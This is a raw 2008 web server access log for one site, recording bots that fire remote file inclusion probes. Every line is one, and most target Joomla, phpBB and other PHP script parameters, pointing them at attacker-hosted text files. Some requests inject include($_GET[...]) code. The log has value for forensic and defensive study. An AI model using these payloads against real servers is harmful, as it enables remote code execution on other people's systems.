206.113.12.153 - - [14/Jul/2008:13:12:02 -0700] "GET //msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:13:12:03 -0700] "GET /logs/access_080118.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:13:12:03 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:13:12:03 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:13:12:11 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:13:12:12 -0700] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:13:12:12 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:13:12:23 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:13:12:28 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:13:12:29 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.30.136 - - [14/Jul/2008:13:12:32 -0700] "GET /logs/multithumb.php?mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.30.136 - - [14/Jul/2008:13:12:32 -0700] "GET /multithumb.php?mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.125.201.18 - - [14/Jul/2008:13:12:34 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:13:12:46 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:13:12:50 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.803" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:13:12:50 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.77.91.153 - - [14/Jul/2008:13:12:53 -0700] "GET /[Scripthttp://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
216.246.29.107 - - [14/Jul/2008:13:12:57 -0700] "GET /logs/access_080329.log/page.php5?id=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.29.107 - - [14/Jul/2008:13:12:57 -0700] "GET /page.php5?id=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.29.107 - - [14/Jul/2008:13:12:57 -0700] "GET /logs/page.php5?id=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:13:12:57 -0700] "GET /logs/access_080329.log/page.php5?id=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:13:12:57 -0700] "GET /page.php5?id=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:13:12:58 -0700] "GET /logs/page.php5?id=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:13:02 -0700] "GET /logs/access_080329.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:13:02 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:13:13:02 -0700] "GET /logs/access_080329.log/page.php5?id=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:13:03 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:13:13:03 -0700] "GET /page.php5?id=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:13:13:03 -0700] "GET /logs/page.php5?id=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.210.89.58 - - [14/Jul/2008:13:13:16 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.accentaroom.com/bbs/skin/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [14/Jul/2008:13:13:22 -0700] "GET /?sourcedir=http://www.accentaroom.com/bbs/skin/df??? HTTP/1.1" 200 18405 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [14/Jul/2008:13:13:22 -0700] "GET /logs/?sourcedir=http://www.accentaroom.com/bbs/skin/df??? HTTP/1.1" 200 56136 "-" "libwww-perl/5.811" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:13:42 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:13:43 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:13:43 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.141.234.2 - - [14/Jul/2008:13:15:06 -0700] "GET /logs/index2.php?x=http://users5.TitanicHost.com/onix2131/cmda.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:15:09 -0700] "GET //msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:15:09 -0700] "GET /logs//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:15:10 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:15:12 -0700] "GET /logs/access_080205.log//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:13:15:13 -0700] "GET /logs/access_080218.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:13:15:14 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:13:15:14 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:13:15:17 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:15:20 -0700] "GET //msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:15:22 -0700] "GET /logs/access_080110.log//send_reminders.php?includedir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:13:15:25 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:15:26 -0700] "GET /logs/access_080218.log//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:15:27 -0700] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.77.91.153 - - [14/Jul/2008:13:15:27 -0700] "GET //admin/index.php?o=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:15:27 -0700] "GET //send_reminders.php?includedir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:13:15:28 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:15:28 -0700] "GET /logs//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:15:30 -0700] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:13:15:39 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:15:55 -0700] "GET /logs//send_reminders.php?includedir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:16:17 -0700] "GET /logs//solpot.html?body=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:16:17 -0700] "GET //solpot.html?body=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:13:16:30 -0700] "GET /logs//zero_vote/ask_password.php?dir=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:13:16:31 -0700] "GET //zero_vote/ask_password.php?dir=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:13:16:34 -0700] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:13:16:35 -0700] "GET /vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.246.29.107 - - [14/Jul/2008:13:16:37 -0700] "GET /logs/access_080315.log/page.php5?id=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:13:16:39 -0700] "GET /logs/access_080315.log/page.php5?id=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:13:16:43 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 500 374 "-" "libwww-perl/5.803" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:16:49 -0700] "GET /logs/access_080128.log//send_reminders.php?includedir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:13:16:50 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 500 374 "-" "libwww-perl/5.803" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:13:16:52 -0700] "GET /logs/access_080315.log/page.php5?id=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.18.175.101 - - [14/Jul/2008:13:17:05 -0700] "GET /logs/access_080225.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://82.104.27.132:25254/stp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.18.175.101 - - [14/Jul/2008:13:17:05 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://82.104.27.132:25254/stp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.30.136 - - [14/Jul/2008:13:17:35 -0700] "GET /logs/access_080313.log/multithumb.php?mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.92.144.58 - - [14/Jul/2008:13:17:55 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.144.58 - - [14/Jul/2008:13:17:55 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.144.58 - - [14/Jul/2008:13:17:55 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.30.136 - - [14/Jul/2008:13:17:56 -0700] "GET /logs/access.log/multithumb.php?mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:18:15 -0700] "GET /logs/access_080218.log//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:18:16 -0700] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:18:16 -0700] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.210.89.58 - - [14/Jul/2008:13:18:20 -0700] "GET /logs/access_080218.log/?sourcedir=http://www.accentaroom.com/bbs/skin/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:13:18:20 -0700] "GET /logs/access_080330.log/page.php?s=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:13:18:21 -0700] "GET /logs/access_080330.log/page.php?s=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.246.29.107 - - [14/Jul/2008:13:18:26 -0700] "GET /logs/access.log/download.php?sub=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.246.29.107 - - [14/Jul/2008:13:18:26 -0700] "GET /download.php?sub=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:18:27 -0700] "GET /logs/access_080110.log//send_reminders.php?includedir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:18:27 -0700] "GET //send_reminders.php?includedir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:18:28 -0700] "GET /logs//send_reminders.php?includedir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.29.107 - - [14/Jul/2008:13:18:30 -0700] "GET /download.php?sub=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:18:45 -0700] "GET /logs/access_080207.log//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:13:18:48 -0700] "GET /logs/access_080205.log//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:13:18:49 -0700] "GET //msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:13:18:49 -0700] "GET /logs//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:13:18:59 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:19:00 -0700] "GET /logs/access_080321.log//solpot.html?body=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:19:00 -0700] "GET //solpot.html?body=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:19:00 -0700] "GET /logs//solpot.html?body=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:19:01 -0700] "GET /logs/access_080222.log//solpot.html?body=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:13:19:08 -0700] "GET /logs/access.log/download.php?sub=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:13:19:09 -0700] "GET /download.php?sub=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.29.107 - - [14/Jul/2008:13:19:09 -0700] "GET /logs/access.log/download.php?sub=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:13:19:09 -0700] "GET /logs/download.php?sub=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.29.107 - - [14/Jul/2008:13:19:09 -0700] "GET /download.php?sub=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.29.107 - - [14/Jul/2008:13:19:09 -0700] "GET /logs/download.php?sub=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:13:19:10 -0700] "GET /logs/access.log/download.php?sub=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:13:19:11 -0700] "GET /download.php?sub=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:13:19:11 -0700] "GET /logs/download.php?sub=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:19:14 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:19:15 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:13:19:15 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.210.89.58 - - [14/Jul/2008:13:19:56 -0700] "GET /logs/?sourcedir=http://www.accentaroom.com/bbs/skin/df??? HTTP/1.1" 200 56136 "-" "libwww-perl/5.811" "www.dmulk.com"
207.210.89.58 - - [14/Jul/2008:13:20:01 -0700] "GET /?sourcedir=http://www.accentaroom.com/bbs/skin/df??? HTTP/1.1" 200 18405 "-" "libwww-perl/5.811" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:13:20:04 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:13:20:08 -0700] "GET /logs/access_080315.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.102.116 - - [14/Jul/2008:13:20:16 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.85.48.114 - - [14/Jul/2008:13:20:16 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
70.85.48.114 - - [14/Jul/2008:13:20:17 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
80.179.231.12 - - [14/Jul/2008:13:20:17 -0700] "GET /logs/include/Classes.inc.php?tm_includepath=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.179.231.12 - - [14/Jul/2008:13:20:17 -0700] "GET /include/Classes.inc.php?tm_includepath=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
